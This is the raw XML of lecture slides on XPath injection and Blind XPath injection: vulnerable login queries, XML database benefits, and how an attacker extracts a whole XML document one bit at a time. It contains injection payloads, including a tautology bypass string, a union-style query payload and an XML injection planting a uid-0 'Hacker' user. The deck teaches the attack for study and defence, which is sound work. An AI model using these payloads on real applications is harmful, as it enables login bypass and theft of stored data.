              <a:t>or applying an XQuery to an XML document,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>the outcome of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Blind XPath Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attack is guaranteed to consist of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>complete XML document</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3020534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endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the account number of the user whose name is "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsmith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" and whose password is "Demo1234" (or an empty string if no such user exists): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>string(//user[name/text()='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsmith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' and password/text()='Demo1234']/account/text())</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70635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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Implications</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benefits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to using an XML database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>portability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>compatibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>re-use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of the document, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>neatness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of the document and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>query results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, and having a structure for the document and the query results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Various products offer native XML databases with built-in XPath query facility </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>vulnerable to Blind XPath Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>within few attempts, the attacker can generate a “template” query data that can be used for Blind XPath Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freccia in giù 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987824" y="4005064"/>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66696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Simple XPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>retrieve the account number of a user whose name and password are received from the client. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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420888"/>
            <a:ext cx="7328322" cy="395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98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Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the attacker were to inject the following values for a new user 'tony':</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iluvbob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>E-mail: alice@example3.com&lt;/mail&gt;&lt;/user&gt;&lt;user&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;Hacker&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;l33tist&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;0&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;&lt;mail&gt;hacker@exmaple_evil.net&lt;/mail&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1140817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a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="4114800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>' or 1=1 or ''=‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>returns the first account number in the XML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Although this attack grants the attacker access to the application, it does not necessarily grant him/her with access as the most privileged account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>NoSuchUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>'] | P | //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/text()='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>NoSuchUser</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>(//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/text()='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>Foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>'] |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>p | /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/text()='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>NoSuchUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>' and password/text()='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>NoSuchPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>']/account/text())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628800"/>
            <a:ext cx="4262278" cy="272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ccia in giù 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="4221088"/>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6012160" y="4432733"/>
            <a:ext cx="2232248" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since the first and the third predicates are always false, the query returns the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>stringvalue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1] of the node -set P.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freccia a destra 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932040" y="5157192"/>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51049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Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It assumes more or less nothing on the structure of the query except that the user data is injected in a Boolean expression context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>enables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attacker to extract a single bit of information per a single query injection: e.g. “Login successful”/“Login failed”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3225918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Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>process</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to crawl an XPath document, using only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>scalar queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a scalar XPath query is replaced by a series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>(«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>booleanization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>» of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>each Boolean query can be resolved by a single “blind” injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>it does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>not require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>much </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>prior knowledge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>of the XPath query format unlike the “traditional” approach </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>It does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>not require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that data from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>XML document is embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>whole XML document is eventually extracted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, regardless of the format of the XPath query used by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3002581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Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Crawling</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The recursion starts with path=''.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The element name (including namespace name) is given as name(path), and the namespace value is namespace-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(path).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The number of attributes of the element is count(path/attribute::*), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attribute name is name(path/attribute::*[position()=N]), the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>th attribute namespace value is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>namespaceuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>( path/attribute::*[position()=N]) and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>th attribute value is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>::*[position()=N].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>There are 4 types of sub-nodes: text, processing-instruction (abbreviated as “PI”), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>element</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
